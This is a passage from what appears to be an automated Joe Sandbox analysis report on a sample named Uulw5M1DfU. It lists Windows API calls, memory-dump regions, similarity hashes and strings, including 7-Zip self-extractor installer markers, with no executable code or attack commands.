                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                • String ID:
                                                                                                • API String ID: 1889686859-0
                                                                                                • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                                • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                                                • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                                                • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 00406F45
                                                                                                • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                                                • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                                                • GetWindowDC.USER32(?), ref: 00406FAA
                                                                                                • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                • String ID:
                                                                                                • API String ID: 2586545124-0
                                                                                                • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                                                • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                                                • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                                                • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                                                • SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMessageSend$Focus
                                                                                                • String ID:
                                                                                                • API String ID: 3946207451-0
                                                                                                • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                                • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@
                                                                                                • String ID: IA$IA$IA$IA$IA$IA
                                                                                                • API String ID: 613200358-3743982587
                                                                                                • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                                • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                                                • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                                                • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@
                                                                                                • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                                                • API String ID: 613200358-994561823
                                                                                                • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                                • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                                                • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                                                • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                                                APIs
                                                                                                • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                                                • GetDC.USER32(00000000), ref: 00406DFB
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2693764856-0
                                                                                                • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                                                • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                                                • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 0040696E
                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                                                • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                                                • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                                                • SelectObject.GDI32(?,?), ref: 004069B8
                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                                                • SelectObject.GDI32(?,?), ref: 004069F9
                                                                                                • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                • String ID:
                                                                                                • API String ID: 2466489532-0
                                                                                                • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                                                • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                                                • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                • wsprintfW.USER32 ref: 00407BBB
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                • String ID: %d%%
                                                                                                • API String ID: 3753976982-1518462796
                                                                                                • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                                • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                                                • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                                                • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$CharUpper$lstrlen
                                                                                                • String ID: hAA
                                                                                                • API String ID: 2587799592-1362906312
                                                                                                • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                                • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                                                • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                                                • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                                                  • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                  • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                  • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                  • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                • API String ID: 4038993085-2279431206
                                                                                                • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                                • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                                                • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                                • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,00000000), ref: 00407579
                                                                                                • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                                                • SuspendThread.KERNEL32(00000290), ref: 004075CD
                                                                                                • ResumeThread.KERNEL32(00000290), ref: 004075EA
                                                                                                • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                • String ID:
                                                                                                • API String ID: 4151135813-0
                                                                                                • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                                                • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                  • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                • wsprintfA.USER32 ref: 00404EBC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$wsprintf
                                                                                                • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                • API String ID: 2704270482-1550708412
                                                                                                • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                                                • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@
                                                                                                • String ID: %%T/$%%T\
                                                                                                • API String ID: 613200358-2679640699
                                                                                                • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                                                • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                                                APIs
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
